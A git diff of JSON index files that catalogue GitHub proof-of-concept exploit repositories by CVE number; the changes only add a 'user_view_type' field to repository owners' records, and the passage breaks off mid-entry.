a/2014/CVE-2014-8731.json b/2014/CVE-2014-8731.json index 3d33055445..d4225f5180 100644 --- a/2014/CVE-2014-8731.json +++ b/2014/CVE-2014-8731.json @@ -7,7 +7,8 @@ "login": "sbani", "id": 3541652, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3541652?v=4", - "html_url": "https:\/\/github.com\/sbani" + "html_url": "https:\/\/github.com\/sbani", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sbani\/CVE-2014-8731-PoC", "description": "CVE-2014-8731 - PHPMemcachedAdmin RCE - Proof of Concept", diff --git a/2014/CVE-2014-8757.json b/2014/CVE-2014-8757.json index 7b1a822e05..9f1968e1a2 100644 --- a/2014/CVE-2014-8757.json +++ b/2014/CVE-2014-8757.json @@ -7,7 +7,8 @@ "login": "irsl", "id": 6357121, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6357121?v=4", - "html_url": "https:\/\/github.com\/irsl" + "html_url": "https:\/\/github.com\/irsl", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/irsl\/lgosp-poc", "description": "LG On Screen Phone authentication bypass PoC (CVE-2014-8757)", diff --git a/2014/CVE-2014-9016.json b/2014/CVE-2014-9016.json index ca364cbd44..96ea23ff5d 100644 --- a/2014/CVE-2014-9016.json +++ b/2014/CVE-2014-9016.json @@ -7,7 +7,8 @@ "login": "c0r3dump3d", "id": 5602401, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5602401?v=4", - "html_url": "https:\/\/github.com\/c0r3dump3d" + "html_url": "https:\/\/github.com\/c0r3dump3d", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/c0r3dump3d\/wp_drupal_timing_attack", "description": "Python scripts to exploit CVE-2014-9016 and CVE-2014-9034", @@ -37,7 +38,8 @@ "login": "Primus27", "id": 47760587, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47760587?v=4", - "html_url": "https:\/\/github.com\/Primus27" + "html_url": "https:\/\/github.com\/Primus27", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Primus27\/WordPress-Long-Password-Denial-of-Service", "description": "Exhaust WordPress